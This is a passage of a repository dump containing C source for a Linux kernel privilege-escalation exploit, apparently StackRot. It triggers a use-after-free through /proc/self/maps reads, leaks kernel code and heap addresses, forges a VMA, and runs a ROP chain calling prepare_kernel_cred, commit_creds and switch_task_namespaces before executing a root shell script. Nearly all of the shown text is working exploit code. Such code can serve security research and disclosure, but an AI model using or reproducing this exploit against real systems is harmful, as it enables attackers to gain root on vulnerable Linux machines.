__OFF_node_data; 476 | retval = do_exp(v); 477 | if (retval < 0) 478 | return retval; 479 | 480 | v = exploit_results[0]; 481 | 482 | fprintf(stderr, L_DONE "[+] Leaked heap address: %lx\n", v); 483 | leaked_heap_addr = v; 484 | 485 | return 0; 486 | } 487 | 488 | extern void get_shell(void); 489 | 490 | asm(".section .rodata\n\t" 491 | "msg: .string \"" A_SUCC "[*] Got root! " 492 | "Run /tmp/exp/as_root.sh\\n" A_RESET "\"\n\t" 493 | "msg_end:\n\t" 494 | "\n\t" 495 | "sh_cmd: .string \"/tmp/exp/as_root.sh\"\n\t" 496 | "sh_arg: .quad sh_cmd\n\t" 497 | " .quad 0\n\t" 498 | "\n\t" 499 | ".section .text\n\t" 500 | "get_shell:\n\t" 501 | "movq $1, %rax\n\t" /* __NR_write */ 502 | "movq $2, %rdi\n\t" /* stderr */ 503 | "leaq msg(%rip), %rsi\n\t" 504 | "movq $msg_end - msg, %rdx\n\t" 505 | "syscall\n\t" 506 | "movq $59, %rax\n\t" /* __NR_execve */ 507 | "leaq sh_cmd(%rip), %rdi\n\t" 508 | "leaq sh_arg(%rip), %rsi\n\t" 509 | "xorq %rdx, %rdx\n\t" 510 | "syscall\n\t" 511 | "ud2\n\t"); 512 | 513 | static unsigned long page_kernel_addr; 514 | static void *page_userspace_ptr; 515 | 516 | static unsigned long kcode_base_addr; 517 | static unsigned long curr_stack_offset; 518 | 519 | static void __exp_rop_entry(void) 520 | { 521 | #define WR_ABS(off, val) \ 522 | (*(unsigned long *)(page_userspace_ptr + (off)) = (val)) 523 | #define WR_REL(off, val) \ 524 | (*(unsigned long *)(page_userspace_ptr + (off)) = \ 525 | page_kernel_addr + (val)) 526 | #define WR_SYM(off, val) \ 527 | (*(unsigned long *)(page_userspace_ptr + (off)) = \ 528 | kcode_base_addr + (val)) 529 | 530 | WR_REL(96 /* vma_area_struct->vm_ops */, -8 /* vm_ops */); 531 | 532 | WR_SYM(-8 /* vm_ops */ + 96 /* vma_ops->name */, 533 | 0xffffffff8122e544 /* movq %rbx, %rsi; 534 | * movq %rbp, %rdi; 535 | * call ffffffff82003260 <__x86_indirect_thunk_r13> */); 536 | 537 | WR_SYM(16 /* indirect jump: %r13 (vma_area_struct->mm) */, 538 | 0xffffffff81b828a4 /* pushq %rsi; jmp 46(%rsi) */); 539 | 540 | WR_SYM(46 /* indirect jump: 46(%rsi) */, 541 | 0xffffffff8195b260 /* popq %rsp; ret */); 542 | 543 | WR_SYM(0 /* stack(%rsp=%rdi): ret */, 544 | 0xffffffff8195b260 /* popq %rsp; ret */); 545 | 546 | WR_REL(8 /* stack(%rsp): popq %rsp */, 128 /* new stack */); 547 | 548 | curr_stack_offset = 128; 549 | 550 | #define ST_ABS(val) \ 551 | (*(unsigned long *)(page_userspace_ptr + curr_stack_offset) = (val)); \ 552 | curr_stack_offset += 8 553 | #define ST_REL(val) \ 554 | (*(unsigned long *)(page_userspace_ptr + curr_stack_offset) = \ 555 | page_kernel_addr + curr_stack_offset + (val)); \ 556 | curr_stack_offset += 8 557 | #define ST_SYM(val) \ 558 | (*(unsigned long *)(page_userspace_ptr + curr_stack_offset) = \ 559 | kcode_base_addr + (val)); \ 560 | curr_stack_offset += 8 561 | } 562 | 563 | static void __exp_rop_cred(void) 564 | { 565 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 566 | 567 | ST_SYM(0xffffffff82814a40 /* init_task */); 568 | 569 | ST_SYM(0xffffffff8109ba00 /* prepare_kernel_cred */); 570 | 571 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 572 | 573 | ST_REL(24 /* %rsp + 24 */); 574 | 575 | ST_SYM(0xffffffff814219af /* movq %rax, (%rdi); 576 | * jmp ffffffff82003300 <__x86_return_thunk> */); 577 | 578 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 579 | 580 | ST_ABS(0xAABBCCDD /* dummy value */); 581 | 582 | ST_SYM(0xffffffff8109b760 /* commit_creds */); 583 | } 584 | 585 | static void __exp_rop_nsproxy(void) 586 | { 587 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 588 | 589 | ST_ABS(1 /* pid */); 590 | 591 | ST_SYM(0xffffffff81094140 /* find_task_by_vpid */); 592 | 593 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 594 | 595 | ST_REL(24 /* %rsp + 24 */); 596 | 597 | ST_SYM(0xffffffff814219af /* movq %rax, (%rdi); 598 | * jmp ffffffff82003300 <__x86_return_thunk> */); 599 | 600 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 601 | 602 | ST_ABS(0xAABBCCDD /* dummy value */); 603 | 604 | ST_SYM(0xffffffff810aa0ed /* popq %rsi; ret */); 605 | 606 | ST_SYM(0xffffffff828517a0 /* init_nsproxy */); 607 | 608 | ST_SYM(0xffffffff81099cb0 /* switch_task_namespaces */); 609 | } 610 | 611 | static void __exp_rop_unlock(void) 612 | { 613 | ST_SYM(0xffffffff81123074 /* popq %rax; ret */); 614 | 615 | ST_SYM(0xffffffff81123074 /* popq %rax; ret */); 616 | 617 | ST_SYM(0xffffffff81002cf4 /* movq %rbp, %rdi; 618 | * call 0xffffffff820030c0 <__x86_indirect_thunk_array> */); 619 | 620 | ST_SYM(0xffffffff812b1240 /* m_stop */); 621 | } 622 | 623 | static void __exp_rop_exit(void) 624 | { 625 | ST_SYM(0xffffffff81e00ed0 /* swapgs_restore_regs_and_return_to_usermo */); 626 | 627 | ST_ABS(0 /* r15 */); 628 | ST_ABS(0 /* r14 */); 629 | ST_ABS(0 /* r13 */); 630 | ST_ABS(0 /* r12 */); 631 | ST_ABS(0 /* rbp */); 632 | ST_ABS(0 /* rbx */); 633 | ST_ABS(0 /* r11 */); 634 | ST_ABS(0 /* r10 */); 635 | ST_ABS(0 /* r9 */); 636 | ST_ABS(0 /* r8 */); 637 | ST_ABS(0 /* rax */); 638 | ST_ABS(0 /* rcx */); 639 | ST_ABS(0 /* rdx */); 640 | ST_ABS(0 /* rsi */); 641 | ST_ABS(0 /* rdi */); 642 | 643 | ST_ABS(0 /* ??? */); 644 | ST_ABS((unsigned long)&get_shell /* rip */); 645 | ST_ABS(0x33 /* cs */); 646 | ST_ABS(0x246 /* eflags */); 647 | ST_ABS(0xCCCC1234 /* rsp */); 648 | ST_ABS(0x2b /* ss */); 649 | } 650 | 651 | static void __exp_prep_rop(void) 652 | { 653 | kcode_base_addr = 654 | leaked_code_addr - __OFF_asm_sysvec_spurious_apic_interrupt; 655 | 656 | __exp_rop_entry(); 657 | 658 | __exp_rop_cred(); 659 | 660 | __exp_rop_nsproxy(); 661 | 662 | __exp_rop_unlock(); 663 | 664 | __exp_rop_exit(); 665 | } 666 | 667 | #define ROP_OFFSET 0x100 668 | 669 | static int __exp_kern_exec(void) 670 | { 671 | int retval; 672 | 673 | page_kernel_addr = (leaked_heap_addr & ~PAGE_MASK) + ROP_OFFSET; 674 | page_userspace_ptr = &vma_page[ROP_OFFSET]; 675 | 676 | __exp_prep_rop(); 677 | 678 | retval = forge_evil_vma(); 679 | if (retval < 0) 680 | return retval; 681 | 682 | retval = do_exp(page_kernel_addr); 683 | if (retval < 0) 684 | return retval; 685 | 686 | return 0; 687 | } 688 | 689 | #define PAUSE_MSEC 200 690 | 691 | static int do_exploiting(void) 692 | { 693 | int retval; 694 | 695 | msleep(PAUSE_MSEC); 696 | retval = __exp_leak_code(); 697 | if (retval < 0) 698 | return retval; 699 | 700 | msleep(PAUSE_MSEC); 701 | retval = __exp_leak_heap(); 702 | if (retval < 0) 703 | return retval; 704 | 705 | setup_nodes(); 706 | teardown_nodes(); 707 | synchronize_rcu(); 708 | 709 | msleep(PAUSE_MSEC); 710 | retval = __exp_kern_exec(); 711 | if (retval < 0) 712 | return retval; 713 | 714 | return 0; 715 | } 716 | 717 | static int run_node_master(void) 718 | { 719 | int retval; 720 | 721 | retval = setup_maps(); 722 | if (retval < 0) 723 | return retval; 724 | 725 | retval = setup_vma_msq(); 726 | if (retval < 0) 727 | return retval; 728 | 729 | retval = do_exploiting(); 730 | 731 | cleanup_vma_msq(); 732 | 733 | return retval; 734 | } 735 | -------------------------------------------------------------------------------- /exp/src/node_use.c: -------------------------------------------------------------------------------- 1 | #include "../nolibc/nolibc.h" 2 | #include "../consts/log.h" 3 | #include "../sys/uio.h" 4 | #include "../utils/string.h" 5 | #include "nodes_master_free_use.h" 6 | #include "nodes_master_and_use.h" 7 | #include "nodes_free_and_use.h" 8 | 9 | #define BUFSZ_PROC_MAPS 1024 10 | static char buf_proc_maps[BUFSZ_PROC_MAPS]; 11 | 12 | #define FAKE_BUFFER_ADDR ((void *)1) 13 | #define FAKE_BUFFER_SIZE (1024 * 1024 * 1024) 14 | 15 | static int __gen_proc_maps(void) 16 | { 17 | int fd, err; 18 | struct iovec iov; 19 | long retval; 20 | 21 | fd = fd_proc_maps; 22 | err = 0; 23 | 24 | retval = read(fd, buf_proc_maps, BUFSZ_PROC_MAPS); 25 | if (retval < 0) { 26 | err = 1; 27 | perror(L_ERROR 28 | "[-] Cannot read from \"/proc/self/maps\" (initialize the kernel buffer)"); 29 | } 30 | 31 | uaf_ready_to_go = 1; 32 | 33 | iov.iov_base = FAKE_BUFFER_ADDR; 34 | iov.iov_len = FAKE_BUFFER_SIZE; 35 | 36 | retval = readv(fd, &iov, 1); 37 | if (retval < 0 && errno != EFAULT) { 38 | err = 1; 39 | perror(L_ERROR 40 | "[-] Cannot read from \"/proc/self/maps\" (fill the kernel buffer)"); 41 | } 42 | 43 | return err ? -1 : 0; 44 | } 45 | 46 | static int __load_proc_maps(void) 47 | { 48 | int fd; 49 | long retval; 50 | 51 | fd = fd_proc_maps; 52 | 53 | for (;;) { 54 | retval = read(fd, buf_proc_maps, BUFSZ_PROC_MAPS - 1); 55 | if (retval > 0) 56 | buf_proc_maps[retval] = 0; 57 | else 58 | break; 59 | } 60 | 61 | if (retval < 0) { 62 | perror(L_ERROR 63 | "[-] Cannot read from \"/proc/self/maps\" (copy to the userspace buffer)"); 64 | return retval; 65 | } 66 | 67 | return 0; 68 | } 69 | 70 | static void load_proc_maps(void) 71 | { 72 | int retval; 73 | 74 | retval = __gen_proc_maps(); 75 | if (retval < 0) 76 | exit(-1); 77 | 78 | if (healthcheck_state == HEALTHCHECK_FREE) 79 | ++healthcheck_state; 80 | fputs(L_DOING "[ ] UAF state update: \"use\" has been completed\n", 81 | stderr); 82 | 83 | retval = __load_proc_maps(); 84 | if (retval < 0) 85 | exit(-1); 86 | 87 | puts(buf_proc_maps); 88 | } 89 | 90 | static int check_no_vsyscall(const char *line, const char *nline) 91 | { 92 | const char *s; 93 | 94 | for (s = line; s < nline; ++s) 95 | if (starts_with(s, "[vsyscall]")) 96 | return -1; 97 | 98 | return 0; 99 | } 100 | 101 | static void __parse_proc_maps(const char *line) 102 | { 103 | unsigned long v1, v2; 104 | const char *s, *t; 105 | 106 | s = parse_hex(line, &v1); 107 | if (s == line) { 108 | fputs(L_ERROR 109 | "[-] Cannot parse memory maps: Invalid start address\n", 110 | stderr); 111 | exit(-1); 112 | } 113 | 114 | if (*s != '-') { 115 | fputs(L_ERROR 116 | "[-] Cannot parse memory maps: Invalid separator between addresses\n", 117 | stderr); 118 | exit(-1); 119 | } 120 | ++s; 121 | 122 | t = parse_hex(s, &v2); 123 | if (t == s) { 124 | fputs(L_ERROR 125 | "[-] Cannot parse memory maps: Invalid end addresses\n", 126 | stderr); 127 | exit(-1); 128 | } 129 | 130 | fprintf(stderr, 131 | L_DONE "[+] Parsed from memory maps: word %lx, word %lx\n", v1, 132 | v2); 133 | exploit_results[0] = v1; 134 | exploit_results[1] = v2; 135 | } 136 | 137 | static void parse_proc_maps(void) 138 | { 139 | const char *line, *nline, *nnline; 140 | int retval; 141 | 142 | line = next_line(buf_proc_maps); 143 | if (!line || !*line) { 144 | fputs(L_ERROR 145 | "[-] Unexpected memory map format: No second line\n", 146 | stderr); 147 | exit(-1); 148 | } 149 | 150 | nline = next_line(line); 151 | if (!nline || !*nline) { 152 | fputs(L_ERROR 153 | "[-] Unexpected memory map format: No third line\n", 154 | stderr); 155 | exit(-1); 156 | } 157 | 158 | nnline = next_line(nline); 159 | if (nnline && *nnline) { 160 | fputs(L_ERROR 161 | "[-] Unsuccessful exploit trial: Memory maps contain the fourth line\n", 162 | stderr); 163 | exit(-1); 164 | } 165 | 166 | retval = check_no_vsyscall(line, nline); 167 | if (retval < 0) { 168 | fputs(L_ERROR 169 | "[-] Unsuccessful exploit trial: Memory maps contain the [vsyscall] line\n", 170 | stderr); 171 | exit(-1); 172 | } 173 | 174 | __parse_proc_maps(line); 175 | } 176 | 177 | static int run_node_use(void) 178 | { 179 | load_proc_maps(); 180 | 181 | parse_proc_maps(); 182 | 183 | return 0; 184 | } 185 | -------------------------------------------------------------------------------- /exp/src/nodes_decl.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static int run_node_master(void); 4 | static int run_node_use(void); 5 | static int run_node_free(void); 6 | -------------------------------------------------------------------------------- /exp/src/nodes_free_and_use.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static volatile int fd_proc_maps; 4 | 5 | static volatile int uaf_ready_to_go; 6 | -------------------------------------------------------------------------------- /exp/src/nodes_master_and_free.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static void *stack_expansion_victim; 4 | 5 | static volatile int free_timing_msec; 6 | static volatile unsigned long exploit_address; 7 | -------------------------------------------------------------------------------- /exp/src/nodes_master_and_use.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static volatile unsigned long exploit_results[2]; 4 | -------------------------------------------------------------------------------- /exp/src/nodes_master_free_use.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define HEALTHCHECK_INIT 0 4 | #define HEALTHCHECK_FREE 1 5 | #define HEALTHCHECK_DONE 2 6 | 7 | static _Atomic int healthcheck_state; 8 | -------------------------------------------------------------------------------- /exp/sys/msg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | typedef int key_t; 6 | 7 | static int msgget(key_t key, int msgflg) 8 | { 9 | int retval; 10 | 11 | retval = my_syscall2(__NR_msgget, key, msgflg); 12 | if (retval < 0) { 13 | SET_ERRNO(-retval); 14 | retval = -1; 15 | } 16 | 17 | return retval; 18 | } 19 | 20 | static int msgsnd(int msqid, const void *msgp, size_t msgsz, int msgflg) 21 | { 22 | int retval; 23 | 24 | retval = my_syscall4(__NR_msgsnd, msqid, msgp, msgsz, msgflg); 25 | if (retval < 0) { 26 | SET_ERRNO(-retval); 27 | retval = -1; 28 | } 29 | 30 | return retval; 31 | } 32 | 33 | static int msgctl(int msqid, int cmd, struct msqid_ds *buf) 34 | { 35 | int retval; 36 | 37 | retval = my_syscall3(__NR_msgctl, msqid, cmd, buf); 38 | if (retval < 0) { 39 | SET_ERRNO(-retval); 40 | retval = -1; 41 | } 42 | 43 | return retval; 44 | } 45 | -------------------------------------------------------------------------------- /exp/sys/uio.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | static long readv(int fildes, const struct iovec *iov, int iovcnt) 6 | { 7 | long retval; 8 | 9 | retval = my_syscall3(__NR_readv, fildes, iov, iovcnt); 10 | if (retval < 0) { 11 | SET_ERRNO(-retval); 12 | retval = -1; 13 | } 14 | 15 | return retval; 16 | } 17 | -------------------------------------------------------------------------------- /exp/sysutil/clone.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | typedef int (*clone_cb_t)(void); 6 | 7 | static pid_t __clone(struct clone_args *cl_args, clone_cb_t cb) 8 | { 9 | pid_t retval; 10 | 11 | asm volatile("syscall\n\t" 12 | "testq %%rax, %%rax\n\t" 13 | "jnz 0f\n\t" 14 | "movq $39, %%rax\n\t" /* __NR_getpid */ 15 | "syscall\n\t" 16 | "movq %%rax, %%rdi\n\t" 17 | "movq $19, %%rsi\n\t" /* SIGSTOP */ 18 | "movq $62, %%rax\n\t" /* __NR_kill */ 19 | "syscall\n\t" 20 | "call *%4\n\t" 21 | "movq %%rax, %%rdi\n\t" 22 | "movq $60, %%rax\n\t" /* __NR_exit */ 23 | "syscall\n\t" 24 | "hlt\n\t" 25 | "0:\n\t" 26 | : "=a"(retval) 27 | : "a"(__NR_clone3), "D"(cl_args), 28 | "S"(sizeof(struct clone_args)), "r"(cb) 29 | : "rcx", "rdx", "r10", "r11", "r8", "r9", "memory"); 30 | 31 | if (retval < 0) { 32 | SET_ERRNO(-retval); 33 | retval = -1; 34 | } 35 | return retval; 36 | } 37 | 38 | static pid_t clone_same_vm(clone_cb_t cb, void *stack, unsigned long stack_size) 39 | { 40 | struct clone_args cl_args = {}; 41 | cl_args.flags = CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND | 42 | CLONE_VM; 43 | cl_args.stack = (long)stack; 44 | cl_args.stack_size = stack_size; 45 | 46 | return __clone(&cl_args, cb); 47 | } 48 | 49 | static pid_t clone_new_vm(clone_cb_t cb, void *stack, unsigned long stack_size) 50 | { 51 | struct clone_args cl_args = {}; 52 | cl_args.flags = CLONE_FS | CLONE_FILES | CLONE_SYSVSEM; 53 | cl_args.stack = (long)stack; 54 | cl_args.stack_size = stack_size; 55 | 56 | return __clone(&cl_args, cb); 57 | } 58 | -------------------------------------------------------------------------------- /exp/sysutil/mbarrier.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | void synchronize_rcu(void) 6 | { 7 | int retval; 8 | 9 | retval = my_syscall3(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); 10 | if (retval < 0) { 11 | SET_ERRNO(-retval); 12 | perror("rcu membarrier"); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /exp/sysutil/pin_cpu.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | 4 | #define CPU_0 0 5 | #define CPU_1 1 6 | 7 | static int __pin_cpu(pid_t pid, unsigned int len, unsigned long *cpu_mask) 8 | { 9 | int retval; 10 | 11 | retval = my_syscall3(__NR_sched_setaffinity, pid, len, cpu_mask); 12 | if (retval < 0) { 13 | SET_ERRNO(-retval); 14 | retval = -1; 15 | } 16 | 17 | return retval; 18 | } 19 | 20 | static int pin_cpu2(pid_t pid, int cpu_id) 21 | { 22 | unsigned long cpu_mask; 23 | int retval; 24 | 25 | cpu_mask = 1UL << cpu_id; 26 | retval = __pin_cpu(pid, sizeof(cpu_mask), &cpu_mask); 27 | 28 | return retval; 29 | } 30 | 31 | static int pin_cpu(int cpu_id) 32 | { 33 | return pin_cpu2(getpid(), cpu_id); 34 | } 35 | -------------------------------------------------------------------------------- /exp/utils/string.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static const char *next_line(const char *s) 4 | { 5 | while (*s && *s != '\n') 6 | ++s; 7 | return *s == '\n' ? s + 1 : NULL; 8 | } 9 | 10 | static const char *starts_with(const char *s, const char *t) 11 | { 12 | while (*t && *t++ == *s++) 13 | ; 14 | return *t ? NULL : s; 15 | } 16 | 17 | static const char *parse_hex(const char *s, unsigned long *r) 18 | { 19 | unsigned long v; 20 | char c; 21 | 22 | v = 0; 23 | while ((c = *s++)) { 24 | switch (c) { 25 | case 'A' ... 'F': 26 | v = v * 16 + (c - 'A') + 10; 27 | break; 28 | case 'a' ... 'f': 29 | v = v * 16 + (c - 'a') + 10; 30 | break; 31 | case '0' ... '9': 32 | v = v * 16 + (c - '0'); 33 | break; 34 | default: 35 | goto out; 36 | } 37 | } 38 | 39 | out: 40 | *r = v; 41 | return --s; 42 | } 43 | -------------------------------------------------------------------------------- /pic/node_master_code_leak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_code_leak.png -------------------------------------------------------------------------------- /pic/node_master_fengshui.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_fengshui.png -------------------------------------------------------------------------------- /pic/node_master_heap_leak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_heap_leak.png -------------------------------------------------------------------------------- /pic/node_master_kern_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_kern_exec.png -------------------------------------------------------------------------------- /pic/nodes_free_and_use.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/nodes_free_and_use.png --------------------------------------------------------------------------------